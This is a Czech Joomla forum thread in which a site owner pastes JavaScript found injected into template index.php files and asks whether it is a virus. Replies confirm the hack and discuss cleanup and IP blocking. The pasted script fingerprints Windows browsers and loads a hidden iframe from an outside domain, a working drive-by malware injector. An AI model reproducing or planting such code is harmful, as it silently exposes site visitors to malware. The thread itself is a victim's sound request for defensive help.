Virus v joomle??

Vladimír Kantor
16. kvě 2014 21:54 #116126
Ahoj chci se zeptat,
včera 15.5. 2014 okolo 23:00 se mi v některých index.php v joomle 2.5 objevil nový kousek kodu.
Myslíte že se může jedna o virus,nebo jde o nějakou automatickou aktualizaci? To si ale nemyslím.
Jde o nějaký js script a vypadá následovně :
</body><script type="text/javascript">if(document.loaded) {

showBrowVer();

} else {

if (window.addEventListener) {

window.addEventListener('load', showBrowVer, false);

} else {

window.attachEvent('onload', showBrowVer);

}

}





function browserDetectNav(chrAfterPoint)

{

var

UA=window.navigator.userAgent, //

//

OperaB = /Opera[ \/]+\w+\.\w+/i, //

OperaV = /Version[ \/]+\w+\.\w+/i, //

FirefoxB = /Firefox\/\w+\.\w+/i, //

ChromeB = /Chrome\/\w+\.\w+/i, //

SafariB = /Version\/\w+\.\w+/i, //

IEB = /MSIE *\d+\.\w+/i, //

SafariV = /Safari\/\w+\.\w+/i, //

//

browser = new Array(),

browserSplit = /[ \/\.]/i,

OperaV = UA.match(OperaV),

Firefox = UA.match(FirefoxB),

Chrome = UA.match(ChromeB),

Safari = UA.match(SafariB),

SafariV = UA.match(SafariV),

IE = UA.match(IEB),

Opera = UA.match(OperaB);



//
Opera ----

if ((!Opera=="")&(!OperaV=="")) browser[0]=OperaV[0].replace(/Version/, "Opera")

else

if (!Opera=="") browser[0]=Opera[0]

else

//
IE

if (!IE=="") browser[0] = IE[0]

else

//
Firefox ----

if (!Firefox=="") browser[0]=Firefox[0]

else

//
Chrom ----

if (!Chrome=="") browser[0] = Chrome[0]

else

//
Safari ----

if ((!Safari=="")&&(!SafariV=="")) browser[0] = Safari[0].replace("Version", "Safari");





var outputData;







if (browser[0] != null) outputData = browser[0].split(browserSplit);

if ((chrAfterPoint==null)&&(outputData != null))

{

chrAfterPoint=outputData[2].length;

outputData[2] = outputData[2].substring(0, chrAfterPoint);

outputData[3] = 'uncomn';

if (UA.indexOf ('Windows') != -1) outputData[3] = 'Windows';

if (UA.indexOf ('Linux')!= -1) outputData[3] = 'Linux';

if (UA.indexOf ('Mac')!= -1) outputData[3] = 'Mac';

if (UA.indexOf ('SunOS')!= -1) outputData[3] = 'SunOS';

if (UA.indexOf ('FreeBSD')!= -1) outputData[3] = 'FreeBSD';





return(outputData);

}

else return(false);

}



function showBrowVer()

{

var data = browserDetectNav();





if (data[0]) {

if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){

var divTag=document.createElement('div');

divTag.id='dt';

document.body.appendChild(divTag);

var js_kod2 = document.createElement('iframe');

js_kod2.src = ' kreotceonite.com/ ';

js_kod2.width = '5px';

js_kod2.height = '3px';

js_kod2.setAttribute('style','visibility:hidden');

document.getElementById('dt').appendChild(js_kod2);

}

}

}</script>

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od ghost
16. kvě 2014 23:02 #116128
ano, mate problem
staci si pohledat treba tu domenu, co je na konci

Joomla! pro každého

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Vladimír Kantor
16. kvě 2014 23:29 #116129
No já prohledal změny ve všech souborech joomly oproti záloze z před pár dny pomocí Altap Salamander a byly tam jen tyto kody v index.php v template a admin/template a tak jsem ty scripty vymazal, změnil heslo k FTP, k databázi i k administraci joomly, no a snad to bude dobrý, nevím,kde bych měl ještě hledat,nebo co udělat ...

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Bong
17. kvě 2014 12:48 #116133
To je trochu málo. Musíte web vyčistit, vše co tam máte zaktualizovat a změnit všechna hesla.

Zkuste si přečíst: www.bongovo.cz/joomla/40-jak-zachranit-hacknutou-joomlu

I'm sorry, my responses are limited...you must ask the right questions.
Poděkovali: Vladimír Kantor

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.

Odpověď od Vladimír Kantor
17. kvě 2014 16:06 #116137
Děkuji za odkaz, pročet jsem ho a vpodstatě to udělal ...

Prostě jsem zkontroloval změny jak v souborech joomly tak v databázi, změnil všechna hesla, krom teda uživatelských a to si myslím stačí. Nevidím důvod, proč přehrávat databázi i soubory všechny ze zálohy,když v nich k žádným změnám nedošlo ani datovým ani obsahovým.

Ještě, protože znám IP, ze které útok přišel jsem chtěl tuto zablokovat v htaccess , ale moc teda nevím jak se to dělá.
V rootu joomly mám pouze soubor htaccess.txt , ale to je asi něco jiného. Nejspíše tedy jestli tomu dobře rozumím, mám vytvořit nový soubor .htaccess a do něj vložit řádek např. deny from 123.156.189.123 a to je vše??? Poradíte prosím ještě jak rozchodit tohle blokování? Děkuji.

Pro možnost přispívání do fóra je nutné: Přihlásit se nebo Vytvořit účet.